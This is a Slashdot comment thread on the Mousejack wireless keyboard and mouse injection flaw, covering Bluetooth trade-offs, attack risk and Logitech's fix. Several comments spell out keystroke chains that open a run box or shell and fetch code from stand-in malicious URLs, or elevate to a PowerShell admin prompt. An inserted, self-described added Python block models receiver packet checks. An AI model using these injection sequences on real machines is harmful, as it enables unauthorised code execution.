Mousejack Attacks Exploit Wireless Keyboards and Mice (threatpost.com) 112
msm1267 writes: Researchers have discovered a vulnerability in the USB devices that support wireless keyboards and mice that could put a countless number of devices at risk of attack. Seven manufacturers have been informed of the flaw, but as of today, only Logitech has produced a firmware update. Some have no update mechanism and can never be patched. The issue lies in the fact that some of the commands from the peripheral device to the dongle are not encrypted. Most do not authenticate packets, and an attacker within close proximity and using a USB transmitting malicious packets over radio frequency can trick the victim's machine into accepting mouse clicks impersonating keystrokes. It would take a matter of seconds for the attacker's code to load a rootkit, malware or additional network access.
And that, ladies and gentlemen... (Score:4, Insightful)
...is why you should be using bluetooth instead of cheaping out. Saves a USB port, too!
Re:And that, ladies and gentlemen... (Score:5, Interesting)
But you'd need a Bluetooth dongle to get that connection... so you'd still be out a USB port. Not sure of many PC's that come with native Bluetooth support
Re: (Score:2)
Dunno. My ~4 year old ASUS motherboard has bluetooth on board.
Re: (Score:2)
I was assuming a laptop, which almost always has built-in Bluetooth. A desktop with no Bluetooth I'd just use a wire.
Bluetooth range (Score:2)
True, but many (most?) PC laptops don't have enough range to use a Bluetooth keyboard or mouse.
And you're basing this on ONE test case? I don't know whether it was the Logitech or the Dell stuff that sucked, but one of them must have.
Between several keyboards, mice, and laptops (Logitech, Microsoft, Dell, and a few no-names), I've never had any real problem with Bluetooth range. The 'whole house' seems to be the range - I only get problems from the furthest bedroom to the garage on the opposite side.
Re:Bluetooth range (Score:5, Insightful)
You tried to use 1600 bluetooth keyboards and mice in relatively close proximity (probably open plan/cubicle office) and are surprised they didn't work? You probably had them all networked using wifi at the same time as well...
Re: (Score:2)
Nope, didn't miss that. You simply repeated the same experiment 'a case worth' of times. Same model Laptops, same production run of mice/keyboards. Hell the mice & keyboards were probably sequentially produced on the same line.
Then, as mindwhip mentioned - how noisy is your environment? My house is a lot quieter on the 2.4GHz zone than an office with lots of laptops connecting wireless. For one, my network is in the 5GHz.
Re: (Score:1)
This is a good point... realistically, why do the wireless keyboard/mouse makers use their own protocol, which is most likely far less secure than something designed by people who know what they are doing? BT is a relatively open protocol that has stood the test of time. Yes, it has had its security issues, but after 10+ years, it is pretty robust, and is definitely good enough, assuming proper pairing with 4-6 digit PINs (and re-pairing happens very infrequently.) If one needs more security, it can be h
Re: (Score:2)
This is a good point... realistically, why do the wireless keyboard/mouse makers use their own protocol, which is most likely far less secure than something designed by people who know what they are doing? BT is a relatively open protocol that has stood the test of time. Yes, it has had its security issues, but after 10+ years, it is pretty robust, and is definitely good enough, assuming proper pairing with 4-6 digit PINs (and re-pairing happens very infrequently.) If one needs more security, it can be handled at the application layer.
When I see some mouse or keyboard requiring its own dongle, I move on. If they are too cheap to use an industry standard for their stuff, then I'm suspecting they skimped on security somewhere else.
I don't know one way or the other, so this is pure speculation, but it may be a cost issue. Some may scoff, but virtually any difference in wholesale / production level quantity costs beyond the trivial usually means one wins overwhelmingly over the other. A case in point ... Firewire chips (the original 400 MHz versions) were about $25 in wholesale / 1000 qty versus USB 1.1 at around $15. FW has significant performance advantages over USB, not the least of which is it is fully self-managing whereas USB req
Re: (Score:3)
Not sure of many PC's that come with native Bluetooth support.
Besides iMacs, which have had it for ten years.
Re: (Score:1)
I wonder if a $10 dongle would remedy the situation with most laptops.
Realistically, in a dense office environment, it might be better to just go with wired devices, to minimize congestion on the airwaves.
Re: (Score:2)
You have a better chance that your computer already has Bluetooth than it has some random proprietary wireless method.
Re: (Score:2)
But you'd need a Bluetooth dongle to get that connection... so you'd still be out a USB port. Not sure of many PC's that come with native Bluetooth support
Most laptops, many all-in-ones, and a few desktops have bluetooth built in. Of course, it's usually attached to the USB bus... but not always
Mousejack? (Score:3)
I thought someone is deploying tools to give rodents hand jobs, and that was terribly odd to be on /.
Re: (Score:2)
Or, just use a wired keyboard and mouse. Wireless keyboard on a desk has always seemed particularly ridiculous to me - the thing doesn't need to move, so why is having a cable an issue?
Re: And that, ladies and gentlemen... (Score:2)
Not every user of a "desktop" computer sits in front of a desk; some sit on a bed or couch (HTPC anyone?). Then there are those who just don't like wires for aesthetic reasons.
Re: (Score:2)
And then there's the %#@%$@ mess on my desktop always getting in the way of the mouse's cable.
Re: (Score:2)
Wireless keyboard on a desk has always seemed particularly ridiculous to me - the thing doesn't need to move, so why is having a cable an issue?
But the keyboard does move -- usually to temporarily make room for something else: notepad, snacks, book, body parts. And then the cable invariably trips either the wine glass or the coffee cup. The wireless signals have a better track record of not doing that.
Re: (Score:2)
I'm the only person in my office that still uses wired keyboard and mouse and I don't find it inconvenient at all. My mug of tea sits between the keyboard and mouse cables and there have been no mishaps.
Re: (Score:2)
Oh the part I hate is the connect delay you get with bluetooth.
If I want to type "The quick brown fox jumps over the lazy dog" on a bluetooth keyboard that has been left idle by the time I finish typing the keyboard has just reconnected and I get "og"
You don't have that problem with most of the proprietary wireless spec keyboards and mice.
Re: (Score:2)
Bluetooth is closed and poorly vetted. Do not count on it being secure.
Re: (Score:2)
Used to be the case that the reaction time on non-BT wireless was quicker. It wasn't necessarily cheaping out as the proprietary solution actually provided a benefit. More overhead in the BT protocol meant more lag. Not sure if that's still true with current BT hardware/software stacks.
Not something you'd notice typing in the office, but gamers...
Re: (Score:2)
The other problem I had with Bluetooth is stuck keys or sticky keys caused by flaky signals. I used to use an Apple Bluetooth keyboard with my Mac Mini. It worked,
Re: (Score:1)
I know this is gonna sound strange, but when it comes to input devices like keyboards and mice, I've had really good luck with Microsoft. I dunno who's making 'em or if they're just rebadged OEM stuff but they're pretty good. I noticed quite by accident and not entirely intentionally. They're good enough that I've stuck with 'em for a long time and have been really happy given the times I've had to use other products.
1. Wireless 2. Secure. (Score:2)
Pick one.
Security is always a trade-off, where you decide how determined your attacker is going to be, and weigh that against convenience.
If you're choosing wireless peripherals, you are leaning so far toward the "convenient" that you're wasting your time if you think any other security measures can make up for it.
No way (Score:5, Funny)
There's no way my wireless keyboard could ever be hacked in this fashion beca I MADE $125,000 YEAR BY USING THESE SIMPLE STEPS - CLICK HERE TO LEARN MORE http://888999444333.ze/?bypass... [888999444333.ze]
Re: (Score:3)
DING! WINNER! Internet won! Time to go home everyone, we're done for the day!
Re: (Score:1)
Silly person -- using a keyboard that &$*#@78g9789%^&#$%^&@$# -- wait, switching to my wired keyboard now. Using a keyboard that can be hijacked like that.
Hold on, my malfunctioning wireless keyboard is blinking something on the LEDs -- S-I-G-N-A-L-J-A-M-M-E-D-N-O-C-A-R-R ...
Re: (Score:1)
Ah, one of my favorite quotes is from a buddy of mine who had lived in the Deep South... "I ain't never scared."
Your link doesn't resolve. Yes, yes I did click it. I figured someone had to.
Risk Level (Score:2)
Just how much of a risk is there to this exploit?
"A Logitech spokesman told the MIT Technology review that the company has a software update to fix the issue, but that the vulnerability Bastille detected “would be complex to replicate” since it requires being physically close to the victim, which makes it “a difficult and unlikely path of attack.”
It seems to me that you would have to be fairly close to the system that you are attacking as the USB plug doesn't have a lot of power or r
Re: (Score:2)
How much of a potential reward is there?
Things like this usually show it's technically feasible, even if impractical. But if the payoff is high enough, it's probably worth someone doing.
Today's "too difficult to replicate" can easily become "tomorrow's hack in the wild". But if someone sees enough possible payoff for doing it, it's just one more thing.
And it seems there's always someone looking to exploit anything just because it's there.
Re: (Score:2)
With such an obvious motive I have zero sympathy for the utter losers that rushed their product out the door with inadequate security. The products are not fit for the purpose they are designed for.
Re: (Score:2)
Of course, the problem with that is that the "losers that rushed their product out the door with inadequate security" aren't the people we need to feel sorry for in this case ... like every other piece of shit consumer technology with non-existent security, it's the consumer who suffers.
Put the makers of this tech on the hook for paying damages, or throw the CEOs in jail .. t
Re: (Score:2)
Just how much of a risk is there to this exploit?
The answer is "enough." I can't imagine coming under this kind of attack myself, but it should be cause enough for a targetable company that deals with sensitive (valuable) data to think twice about rolling out wireless keyboards/mice.
it requires being physically close to the victim['s computer]
which could be on the other side of a locked door, or a (fairly thin) wall, or a floor...
High, actually. Re:Risk Level? (Score:5, Informative)
The issue is that if this can be a broadcast attack, it doesn't need to be successful any more than hacking an ad network needs 100% infection rates - if I can drive up outside a multi-story office building with a cheap adapter at the end of a USB extension cable (and perhaps an appropriate dish) and broadcast "Win-R http://attacksite.site/<Enter>", how many of the PCs in window offices will load that site which loads various exploits based on detection of the browser? This is even better than spearphishing because I don't have to worry about getting through email filters, and if I manage it right I know what company/companies I targeted at what time along with my trojan access to one or more computers within those offices.
Remember, this is injection of events, not 2-way communication. There's no handshaking or anything else.
I'm going to be keeping track of this and probably pushing some customers to eliminate or at least replace some cordless equipment - that was an agenda item before, but this can make it a high-priority agenda item.
Load malware? (Score:2, Insightful)
“It would take a matter of seconds for the attacker's code to load a rootkit, malware or additional network access.”
Really? With just keystrokes and mouse moves? With no feedback about where the keystrokes and clicks end up?
For a particular target, a way can probably be devised, but it will most likely be slow and visible. And not work with the next target.
Injecting keys is clearly a security flaw with severe consequences, but over-hyping it is unproductive.
Re:Load malware? (Score:4, Informative)
Really? With just keystrokes and mouse moves?
Yup. Actually, just keystrokes - the summary's a bit confused on the subject, but the article says nothing about spoofing mouse moves and clicks - it does, however, say that in some cases an attacker can impersonate the mouse but use it to send keypress packets (the keyboards in question encrypt these, but the receiver accepts them unencrypted from the "mouse").
but it will most likely be slow and visible
Not necessarily. What if you want access to a computer you can see through a window (and verify that no-one is near), but is behind a locked door? Even if you can't see the screen, sending Win+R c m d [enter] and so on seems fairly doable.
Re: (Score:2)
Really? With just keystrokes and mouse moves? With no feedback about where the keystrokes and clicks end up?
start-button->cmd->ftp(malware site & file)->execute downloaded malicious file.
as long as the start button isn't actually up when you do it, it should have a reasonable chance of success.
Re: (Score:2)
What's a “start button”? :-
And to wonkey_monkey: what would “òcmd” achieve? “ò” is the character that XTerm generates with win-R.
To achieve anything, you need either feedback (“see through a window”) or strong assumptions about the user interface currently running.
Re: (Score:2)
What's a “start button”?
The button that typically has the picture of a window on it.
start->R gives you the ability to execute a command via type interface on windows. Use it to spawn a CLI shell. use CLI shell to write a script that spawns a process that downloads & executes the malware.
Yes, it's operating system specific. So freaking what? So isn't the malware I'm going to attempt to load. There's not enough linux users out there to matter, as the AC mentions. Crackers, like terrorists, like to target soft targets.
Re: (Score:2)
testing with my Mint install: Alt-F2 instead, then gnome-terminal.
or start button ->terminal
both bring up a command prompt, which will allow you to(depending on settings) download and execute a file.
assuming they're not stupid enough to run as root, they're at least limited to the user's rights unless an exploit exists; getting code to execute on the target machine is 90% of the work.
Re: (Score:2)
On Windows, sure:
Win-R
"powershell" + Enter
"start-process powershell -verb runas" + Enter
one left-arrow key
Enter
This should work on practically any Windows install that includes PowerShell and is at a live desktop. You're now at an admin shell from which you can download whatever you want and run it. As you mentioned, all of this activity will be visible, but if you're away from the keyb
Re: (Score:2)
So it works in certain cases with a lot of assumptions. Exactly what I was saying.
Re: (Score:2)
So it works in certain cases with a lot of assumptions. Exactly what I was saying.
Where "certain cases with a lot of assumptions" equals "a computer running a recent version of Windows". I'm guessing that there might be a few of those out there.
Re: (Score:1)
The terminal is *usually* mapped to CTRL + ALT + T with *most* distros that I've actually dug into. I've noticed one that didn't do that, I think I've made it so it *does* do that on that VM. I can dig it back out. I didn't check it on all of 'em nor have I tried all of 'em. I'm pretty sure that if I can get that close to the device, I can take a minute to figure out what the OS is. Hell, I can probably find the layout and then write a shim and mirror it over a replicated desktop and map mouse movements, al
Re: (Score:2)
And where "recent" equals "any version released in the last 10 years".
Re: (Score:1)
“It would take a matter of seconds for the attacker's code to load a rootkit, malware or additional network access.”
Really? With just keystrokes and mouse moves? With no feedback about where the keystrokes and clicks end up?
Win-R -> http://www.malicious-site.com/ [malicious-site.com] -> flash exploit (or whatever)
matter of seconds.
Re: (Score:2)
"With no feedback about where the keystrokes and clicks end up?"
I'm guessing most OSes have a hot key to access the menu, from there you can start an appropriate terminal using just keystrokes, and once in a terminal, well.... it's open slather. Don't dismiss what can be done with just keystrokes.
Re: (Score:2)
"without feedback"
Except you do get feedback... whether your OS-specific exploit worked or not. If it does work, then the target is using that exploit. If not, try an exploit specific to a *different* OS. Start off just trying to ping a known address where you are logging, and note which stage gives you a ping that actually shows up in the log. Once you have identified the OS then you can get on with the real payload.
Re: (Score:2)
Yes. Keyboard shortcut to launch browser then URL.
If you order it to download your rootkit or whatever you can get feedback from wherever you have hosted your little bit of nastiness to tell you that it has been picked up.
Re:Load malware? (Score:4, Informative)
Re: (Score:2)
Yes, just typing, and in a matter of seconds. Just typing: no seeing what you type, no knowing the keyboard layout, no knowing the user interface running, nothing except keys blindly. As was already pointed out by numerous persons before you posted your duplicated comment, this would work on lusers computers left to the default values. A rather costly attack (requires hardware and physical presence) that can only work generically on the most worthless of targets. Not really worrying. (Of course, for targete
Re: (Score:2)
Don't need to know the keyboard layout. Only need to guess that it's a Windows machine that is unlocked. You could also move the mouse or perhaps press the scroll-lock key occasionally to prevent the screen saver from automatically starting.
Unlike most of the other responses that I scanned through at the time, which required a browser exploit, or ftp access. This approach could be used to run arbitrary code without the assistance of a 3rd party server, or a known browser exploit. It only depended on Win+R,
Re: (Score:2)
Two mistakes in your message:
“Don't need to know the keyboard layout”: how do you type the ‘m’ in “cmd” on an AZERTY keyboard?
“Arbitrary code”: no, only code that is already present on the computer. Typing binaries with just the keyboard and generic software is tricky.
Re: (Score:2)
We're talking about a targeted attack that requires local (-ish) access. Firstly you can probably assume the target has a locale appropriate to their location. However that isn't required, as a USB HID device can send raw 16-bit unicode.
Did you really read that link?
# our hex binary
shell_exec = "4d5a90000300000004000....
That's a hex dump of a PE .exe file. They then type a powershell script to convert it to binary. That's arbitrary code right there. Unless you have gone to unusual lengths to prevent the launching of an .exe.
"mouse clicks impersonating keystrokes" (Score:2)
mouse clicks impersonating keystrokes.
The article is clearer on what this is supposed to mean:
An attacker can impersonate the mouse but transmit keypress-packets
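The receiver-side flaw described in this thread (keypress frames accepted without authentication, even from an address paired as a mouse) can be modelled as an acceptance policy, with the weak check beside a hardened one. This is an added example, not part of the discussion and not any vendor's firmware; the frame layout, addresses, keys and function names are all constructed for illustration.

```python
import hashlib
import hmac
from dataclasses import dataclass

MOUSE, KEYBOARD = "mouse", "keyboard"
MOVE, KEYPRESS = "move", "keypress"
# Hypothetical policy: which frame kinds each paired device type may send.
ALLOWED = {MOUSE: {MOVE}, KEYBOARD: {KEYPRESS}}

@dataclass
class Packet:
    src: str          # radio address the frame claims to come from
    kind: str         # MOVE or KEYPRESS
    counter: int      # per-device monotonic counter (replay protection)
    payload: bytes
    tag: bytes = b""  # empty tag = unauthenticated frame

@dataclass
class Paired:
    device_type: str
    key: bytes        # per-device secret set at pairing (constructed here)
    last_counter: int = -1

def make_tag(key, kind, counter, payload):
    msg = kind.encode() + counter.to_bytes(4, "big") + payload
    return hmac.new(key, msg, hashlib.sha256).digest()[:8]

def vulnerable_accept(paired, pkt):
    # Weak check: any frame from a paired address is accepted, whatever
    # its kind and whether or not it is authenticated.
    return pkt.src in paired

def hardened_accept(paired, pkt):
    dev = paired.get(pkt.src)
    if dev is None:
        return False
    if pkt.kind not in ALLOWED[dev.device_type]:
        return False                     # a mouse may not send keypresses
    expected = make_tag(dev.key, pkt.kind, pkt.counter, pkt.payload)
    if not hmac.compare_digest(expected, pkt.tag):
        return False                     # missing or wrong tag
    if pkt.counter <= dev.last_counter:
        return False                     # replayed frame
    dev.last_counter = pkt.counter
    return True

def fresh_pairing():
    return {"KB01": Paired(KEYBOARD, b"k" * 16),
            "MS01": Paired(MOUSE, b"m" * 16)}

def sample_frames(paired):
    # Constructed sample traffic, not captured from real hardware.
    kb, ms = paired["KB01"], paired["MS01"]
    good_key = Packet("KB01", KEYPRESS, 1, b"\x04",
                      make_tag(kb.key, KEYPRESS, 1, b"\x04"))
    good_move = Packet("MS01", MOVE, 1, b"\x01\x02",
                       make_tag(ms.key, MOVE, 1, b"\x01\x02"))
    return [good_key, good_move,
            Packet("MS01", KEYPRESS, 2, b"\x15"),   # untagged, mouse address
            Packet("KB01", KEYPRESS, 2, b"\x15"),   # untagged, keyboard address
            Packet("MS01", KEYPRESS, 3, b"\x15",    # tagged, but wrong device type
                   make_tag(ms.key, KEYPRESS, 3, b"\x15")),
            good_key]                               # replay of a genuine frame

def run_demo(accept):
    paired = fresh_pairing()
    return [accept(paired, p) for p in sample_frames(paired)]

if __name__ == "__main__":
    print("vulnerable:", run_demo(vulnerable_accept))
    print("hardened:  ", run_demo(hardened_accept))
```
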
Last Post (Score:1)
Say goodbye Microsoft keyboard and mouse. Glad I had a spare :-/
Affected devices [bastille.net]
"Working with vendors for 90 days" (Score:1)
Logitech firmware update not _actually_ available? (Score:1)
As of 13:35 Pacific time, the updated Logitech firmware doesn't seem to be actually downloadable.
It's nice of Logitech to develop such software, but they actually have to publish it for it to make a difference.
(Tried both my OSX and Windows 7 machines, the Logitech Unify software says no updates available, nothing but questions on their forum)
Re: (Score:1)
Here's the official statement from Logitech.
The post:
http://forums.logitech.com/t5/Mice-and-Pointing-Devices/Logitech-Response-to-Unifying-Receiver-Research-Findings/m-p/1493878/thread-id/73186
The file
http://logt.ly/0222
DL the linked file, run it (it will not really do anything that you can see) then try updating the firmware thru the Unifying software. It is all in the post
So where's this Logitech firmware update? (Score:2)
So where's this Logitech firmware update? I searched their website, looked at the downloads offered for my mouse (MX Master), and there isn't a firmware update utility. Checked all OSes.
I wish I could use just bluetooth with it instead of the dongle, but Ubuntu 14.04 doesn't seem to work with it with bluetooth... My chromebook on the other hand works flawlessly.
Download links (Score:1)
Here ya go...
https://forums.logitech.com/t5... [logitech.com]
Just buy a similar keyboard/mouse (Score:4, Funny)
I worked as a one-man IT dept for a small private school for a few years. Someone donated a bunch of wireless keyboard/mouse sets one year, which were used by several of the teachers (without my involvement).
Shortly afterwards, I started getting odd "OMG, my computer is infected" reports. Mouses were moving on their own, and random typing was appearing out of nowhere.
The ethernet jacks were usually on shared walls, which resulted in PCs ending up on opposite sides of the same wall (only 2-3 feet apart). Since the devices only had three channels, several of these pairs had ended up on the same one, with hilarity ensuing. :)
Reversed sounds worse (Score:2)
Could this hack be reversed, ie: log keystrokes from a wireless keyboard? That sounds substantially more dangerous and more useful to a hacker than sending keystrokes. I've always been wary of wireless keyboard for this reason, but mice are pretty much a non-issue if their data could be captured. Mouse data sending is probably just as useless.
Logitech's response (Score:1)
Here's the official statement from Logitech.
The post:
http://forums.logitech.com/t5/Mice-and-Pointing-Devices/Logitech-Response-to-Unifying-Receiver-Research-Findings/m-p/1493878/thread-id/73186
The file
http://logt.ly/0222
DL the linked file, run it (it will not really do anything that you can see) then try updating the firmware thru the Unifying software. It is all in the post
I installed this and it breaks a few things in the software, like displaying variables instead of the text in the update options, but i
Glad I dont use wireless keyboards and mice... (Score:2)
Not only do wireless keyboards and mice (regardless of technology) chew through batteries but they are also vulnerable to attacks? Glad I am not using them on my PC then (Logitech K120 keyboard and Gigabyte GM-M6580 laser mouse)
Re: (Score:2)
I have to replace the batteries in my BT keyboard about every six months. My BT mouse is still on its original set, two years later.
Re: (Score:2)